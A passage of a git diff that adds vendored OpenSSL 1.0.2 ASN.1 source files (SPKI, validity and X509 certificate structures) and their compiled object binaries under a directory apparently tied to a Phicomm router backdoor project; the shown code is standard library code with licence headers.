+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+ /*
+  * This module was send to me my Pat Richards <patr@x509.com> who wrote it.
+  * It is under my Copyright with his permission
+  */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/asn1t.h>
+
+ASN1_SEQUENCE(NETSCAPE_SPKAC) = {
+        ASN1_SIMPLE(NETSCAPE_SPKAC, pubkey, X509_PUBKEY),
+        ASN1_SIMPLE(NETSCAPE_SPKAC, challenge, ASN1_IA5STRING)
+} ASN1_SEQUENCE_END(NETSCAPE_SPKAC)
+
+IMPLEMENT_ASN1_FUNCTIONS(NETSCAPE_SPKAC)
+
+ASN1_SEQUENCE(NETSCAPE_SPKI) = {
+        ASN1_SIMPLE(NETSCAPE_SPKI, spkac, NETSCAPE_SPKAC),
+        ASN1_SIMPLE(NETSCAPE_SPKI, sig_algor, X509_ALGOR),
+        ASN1_SIMPLE(NETSCAPE_SPKI, signature, ASN1_BIT_STRING)
+} ASN1_SEQUENCE_END(NETSCAPE_SPKI)
+
+IMPLEMENT_ASN1_FUNCTIONS(NETSCAPE_SPKI)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_spki.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_spki.o
new file mode 100644
index 0000000000000000000000000000000000000000..69be6d8cbd2cd9683fd1fbbaeba4ed133015c153
GIT binary patch
literal 4296
zcmb`K&2Jl35Wt`7(grBhDIkIhWlywxbY+J|p@>#?jN@3b5-WB@K)`0>ERKo4u-B@C
zP-_XUNI^mfsRwdF;=qX$M<09Sz#o9biCZhg1tFE0w=?nccvmVFBdurV_h#n3eQ)=@
z^{rfS`9v(HSYqnB8hcEYS~)Ye)7ng{b81%odG^BJD_=f=<PZD_{AYxJP52AKfB5{h
zT&0}NlyXkFv|3QT&c0h!y?V`Y8?|;9t(NQeyPh)RGFjE>@9cXAs=DVk8eXgB;dnxY
z=OQ6m<HDa4KD$x*Cpdt#tS_4Xvpe&E8UJ^`+-+q4`E2%0>(b^<zvcI>tM==5@^Wgi
zuiezm`J|n^@^XNKN+&_#7$1QvzqYAh-bToH{+|XLCHCotiVYI6^Jh-a9Kxhy&hxq@
zu+c=83}J7Fu&of*2w}qz_H_vRK`?Ts6h1E})xG;u4FKYyZzgh{jmfMyR0@;0p3Ui&
zxH>fj9|ICo<JBA(5pjbvev#sb1WMchI<6i!ys;Tq#^y4{5U=+Ig9K(=;ix7Bca(F+
z{NP%ntiUx3_mxHm<c&b7_ds(DA+0(Q{3dX$&pE8WiirP?;w{i99RHJH>jwH6fyVkt
z@;Uxj@Y$v&t$v4Jj87Bfn7_cs`(@$#Jp~UI#+O9=9Pw?zUm@NR{2FlXi<-1rjo=?f
z@MZ*80|z$ox?P>vu?tSm`^54637E+;-JP#HVuPP_ow~1_d~tm#Q*_psm&>_|Q^_n9
zbB@ZC*HX~xH619T>hrs@&^Q1ZW&bVjhEV}M(eFoH&od&lD@R+HNGjl1<v3)B?5W`B
z%3BM`t4^kvU*EtYdgM!mic_v^6xQ;HbU<lyX*KumaYP}rFb+_sX;JZfIt$l7_XBx0
zf?tf_ixE6;@aMqh`tL;WS_Hol!Feaaoo^N{uFq!y@}~^`8rUev@vDX7-$Dq29PgcZ
z5g~}I|9*fqH|sYHZr1<I;AVY(x8U`d*j<wpj~vfJmJ%5pKP10naE!l1{+!@Xl5ZIt
z*PSIz2KUS7E$*u*$Y0P_@UurY$6p}d91k;W`c}j*l7D1yJX2UkWN`iK<liy4MK&t7
z@p;CJ<q8?h6Xf%KF}H~G`Z7-v=lf!wCjJF!<|Xp^ewl9*|53zqU1j$Un!dXO+V2K>
zkFBoPaBbfk_{!dOeOK8#y`HkWZFDd^Wv9T!AWgu6M!V6jx{YbB>}tE&^jc7?)%HCb
zKDI9Re7Cw!ey!EFJKc82>-q<j?d`#~<2Iu|p6Q+*L|G7oYdSu;f~<6))Q~hQj5Xyv
zIQUMcO$c^kCICZ9z-Jpx!iwLAmx#+RsS)rnk^SR7f;AsDKLxp1a~>{JM&$5w$!**}
z>l`$oE&I19V8Dr_E#arZ51YTkM}xraK<P69*GSIa2f)JmKcfDBp?p>r8>F{DhxLD#
z`oBwYxPI8T?Ehn6*i{lPQ#$yffxH^1<6jz<&Oz9Ni`j7y7`G|kWN6FS&w=6DDZ`Hl
zSkPt)kDu9XFtDb~9})PO14+yLZ-9r*-*5D(Jfb|DKm4lZe187J`o@$2Jy3I`6TtAy
ikomYw^4SBV4(WxyB_>R``m7GiKcc@3-(xXDWd6T!JGJ@%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_val.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_val.c
new file mode 100644
index 0000000..ee75a1e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_val.c
@@ -0,0 +1,69 @@
+/* crypto/asn1/x_val.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+
+ASN1_SEQUENCE(X509_VAL) = {
+        ASN1_SIMPLE(X509_VAL, notBefore, ASN1_TIME),
+        ASN1_SIMPLE(X509_VAL, notAfter, ASN1_TIME)
+} ASN1_SEQUENCE_END(X509_VAL)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_VAL)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_val.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_val.o
new file mode 100644
index 0000000000000000000000000000000000000000..99ba72a93188b0923922db7114eaad9ceb55342f
GIT binary patch
literal 3000
zcmbuAOK;Oa5XUE^ykBj33xs^)A;5A9h!z1#3TZ(K578D?0_3KtOAAdx6Bh~xsKgZ{
zP8{IEg#%xJGarGEz!8p!8$yEluV?JVaSp&p>zVoO%<Ou-yM9`(jI7G#NF_(-DDjjM
z4X#b>qA`oqPkr=#>;4}XUu*{Xibv${Ncm?|{>j*%Jn0SjH%b+1G{fOww%H0`m1e`B
zg_w9Qy~ax(s}j>#>HbvrU%TtNWsIIbf7&@TF}>6Xmz*K@xa%D&oLVw&;mLsKdM6G?
zI4aP?3Ugb{ZS=|n@w`8R<+(w&M~ZTfuTyThH@A1w+I27a10ZLg^y#}ndl~FP2AfPV
zaXS>gbq{^})zQHqAFuwOz4>_dX^uDRl)QQSEWV}#u4j^?Wc9CE5qXPSm}j%mc4IqF
zn_}BG@?`d_jf|bA4IOL`lYVO*^jjQY-bcy&2PJcWwZ;fC>S7mugE{JJj_O*M_(h3#
zSVJ`aiDjD(c|2#0`kwe2|C)WZrOT-IT{tcK52_1pjr73!?O@RlLz)?w_mw4`^C9`8
zm8-+0ihp%vWUM^ykC%okWuHo8R|@`o7}R}Er1^oFBsu9~oRn$=53MYCI-Eb-3IeMy
zamO!RF7qh-E_!X@zSzR;=dVb1u?<P{gAwlFr@C<6VS3KBzMft1es0Q-N*!>VedT8?
zzSH9Rjc`trQ<2;Q;J8~<c8j4L=LzDNXLO(Hy8{(1jyl`K$9{#Njvem+vS8iNR8EMY
zT<5KIlsgi4D;4jFPj35BJ*-Z%4qK6)Q>zs$RNXLG4#}OVhE;N>+ih}NO*jZIxCM3*
zWC&Z_=`J*D)rC$@Zmn6b2MsR9Kb*kj%lTM4tk&*{f2XnJ-fuPU2d(gtWCwG+<Er&Q
zr}{tI;bg3Ba)U(GijgAK;+j~sq4#pb9x8IP<uf45NAo1w${OS7-qHPm`wLwELu?vZ
z5uH|uwFUbaHUBlgz`3Z2`_h&barFFXpN_A(%pI`P<G+;zy^qBuM-9<M)>-TKRt}Ty
zN30*dQF{GuGs_zPGjqtbNX1VlwjyJaRo3{QWc(?K$M_gKJ^o#07+>efrV$U2<w&IB
zr(lx<*yg4z4r1eG7R-o!#te5W&b2L5lJD4%ZJod3H*6p@oxdXaa~dc*o&Sn?*7|vJ
zpr#}b>xaL+=Ij2?8XGBJWc;E`thY-(?$z|(L;fK-e;?pjB4uOJ$5vMUOPT+>I5INQ
G`M&|Tkp1-l

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509.c
new file mode 100644
index 0000000..cd838e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509.c
@@ -0,0 +1,220 @@
+/* crypto/asn1/x_x509.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+ASN1_SEQUENCE_enc(X509_CINF, enc, 0) = {
+        ASN1_EXP_OPT(X509_CINF, version, ASN1_INTEGER, 0),
+        ASN1_SIMPLE(X509_CINF, serialNumber, ASN1_INTEGER),
+        ASN1_SIMPLE(X509_CINF, signature, X509_ALGOR),
+        ASN1_SIMPLE(X509_CINF, issuer, X509_NAME),
+        ASN1_SIMPLE(X509_CINF, validity, X509_VAL),
+        ASN1_SIMPLE(X509_CINF, subject, X509_NAME),
+        ASN1_SIMPLE(X509_CINF, key, X509_PUBKEY),
+        ASN1_IMP_OPT(X509_CINF, issuerUID, ASN1_BIT_STRING, 1),
+        ASN1_IMP_OPT(X509_CINF, subjectUID, ASN1_BIT_STRING, 2),
+        ASN1_EXP_SEQUENCE_OF_OPT(X509_CINF, extensions, X509_EXTENSION, 3)
+} ASN1_SEQUENCE_END_enc(X509_CINF, X509_CINF)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_CINF)
+/* X509 top level structure needs a bit of customisation */
+
+extern void policy_cache_free(X509_POLICY_CACHE *cache);
+
+static int x509_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                   void *exarg)
+{
+    X509 *ret = (X509 *)*pval;
+
+    switch (operation) {
+
+    case ASN1_OP_NEW_POST:
+        ret->valid = 0;
+        ret->name = NULL;
+        ret->ex_flags = 0;
+        ret->ex_pathlen = -1;
+        ret->skid = NULL;
+        ret->akid = NULL;
+#ifndef OPENSSL_NO_RFC3779
+        ret->rfc3779_addr = NULL;
+        ret->rfc3779_asid = NULL;
+#endif
+        ret->aux = NULL;
+        ret->crldp = NULL;
+        CRYPTO_new_ex_data(CRYPTO_EX_INDEX_X509, ret, &ret->ex_data);
+        break;
+
+    case ASN1_OP_D2I_POST:
+        if (ret->name != NULL)
+            OPENSSL_free(ret->name);
+        ret->name = X509_NAME_oneline(ret->cert_info->subject, NULL, 0);
+        break;
+
+    case ASN1_OP_FREE_POST:
+        CRYPTO_free_ex_data(CRYPTO_EX_INDEX_X509, ret, &ret->ex_data);
+        X509_CERT_AUX_free(ret->aux);
+        ASN1_OCTET_STRING_free(ret->skid);
+        AUTHORITY_KEYID_free(ret->akid);
+        CRL_DIST_POINTS_free(ret->crldp);
+        policy_cache_free(ret->policy_cache);
+        GENERAL_NAMES_free(ret->altname);
+        NAME_CONSTRAINTS_free(ret->nc);
+#ifndef OPENSSL_NO_RFC3779
+        sk_IPAddressFamily_pop_free(ret->rfc3779_addr, IPAddressFamily_free);
+        ASIdentifiers_free(ret->rfc3779_asid);
+#endif
+
+        if (ret->name != NULL)
+            OPENSSL_free(ret->name);
+        break;
+
+    }
+
+    return 1;
+
+}
+
+ASN1_SEQUENCE_ref(X509, x509_cb, CRYPTO_LOCK_X509) = {
+        ASN1_SIMPLE(X509, cert_info, X509_CINF),
+        ASN1_SIMPLE(X509, sig_alg, X509_ALGOR),
+        ASN1_SIMPLE(X509, signature, ASN1_BIT_STRING)
+} ASN1_SEQUENCE_END_ref(X509, X509)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509)
+
+IMPLEMENT_ASN1_DUP_FUNCTION(X509)
+
+int X509_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                          CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_X509, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int X509_set_ex_data(X509 *r, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&r->ex_data, idx, arg));
+}
+
+void *X509_get_ex_data(X509 *r, int idx)
+{
+    return (CRYPTO_get_ex_data(&r->ex_data, idx));
+}
+
+/*
+ * X509_AUX ASN1 routines. X509_AUX is the name given to a certificate with
+ * extra info tagged on the end. Since these functions set how a certificate
+ * is trusted they should only be used when the certificate comes from a
+ * reliable source such as local storage.
+ */
+
+X509 *d2i_X509_AUX(X509 **a, const unsigned char **pp, long length)
+{
+    const unsigned char *q;
+    X509 *ret;
+    /* Save start position */
+    q = *pp;
+    ret = d2i_X509(a, pp, length);
+    /* If certificate unreadable then forget it */
+    if (!ret)
+        return NULL;
+    /* update length */
+    length -= *pp - q;
+    if (!length)
+        return ret;
+    if (!d2i_X509_CERT_AUX(&ret->aux, pp, length))
+        goto err;
+    return ret;
+ err:
+    X509_free(ret);
+    return NULL;
+}
+
+int i2d_X509_AUX(X509 *a, unsigned char **pp)
+{
+    int length;
+    length = i2d_X509(a, pp);
+    if (a)
+        length += i2d_X509_CERT_AUX(a->aux, pp);
+    return length;
+}
+
+int i2d_re_X509_tbs(X509 *x, unsigned char **pp)
+{
+    x->cert_info->enc.modified = 1;
+    return i2d_X509_CINF(x->cert_info, pp);
+}
+
+void X509_get0_signature(ASN1_BIT_STRING **psig, X509_ALGOR **palg,
+                         const X509 *x)
+{
+    if (psig)
+        *psig = x->signature;
+    if (palg)
+        *palg = x->sig_alg;
+}
+
+int X509_get_signature_nid(const X509 *x)
+{
+    return OBJ_obj2nid(x->sig_alg->algorithm);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509.o
new file mode 100644
index 0000000000000000000000000000000000000000..28d7a02da41fdc8635d8157d4457219a8f102574
GIT binary patch
literal 8224
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
Js&+N&{}&rzLN)*Z

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509a.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509a.c
new file mode 100644
index 0000000..76bbc13
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_x509a.c
@@ -0,0 +1,193 @@
+/* a_x509a.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
